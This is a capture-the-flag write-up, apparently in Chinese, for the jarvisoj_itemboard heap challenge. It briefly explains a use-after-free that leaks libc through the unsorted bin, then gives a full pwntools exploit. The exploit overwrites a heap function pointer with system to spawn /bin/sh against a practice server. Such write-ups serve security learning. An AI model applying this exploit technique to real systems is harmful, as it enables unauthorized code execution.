jarvisoj_itemboard
查看保护
简单题目
uaf漏洞
攻击思路:利用unsortedbin直接泄露出libc。劫持堆里面的指针为system下一次delete的时候就可以sysem(“/bin/sh”);笔者就不多写了比较简单,uaf手法可以看z1r0 's blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27746)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def add(name, length, desc):
r.sendlineafter("choose:", "1")
r.sendlineafter("Item name?\n", name)
r.sendlineafter("Description's len?\n", str(length))
r.sendlineafter("Description?\n", desc)
def show(idx):
r.sendlineafter("choose:", "3")
r.sendlineafter("Which item?\n", str(idx))
def delete(idx):
r.sendlineafter("choose:", "4")
r.sendlineafter("Which item?\n", str(idx))
add('aaaa', 0x80, 'bbbb')
add('dddd', 0x20, 'dddd')
delete(0)
show(0)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
delete(1)
add('a' * 16, 24, b'/bin/sh;aaaaaaaa' + p64(system_addr))
delete(0)
r.interactive()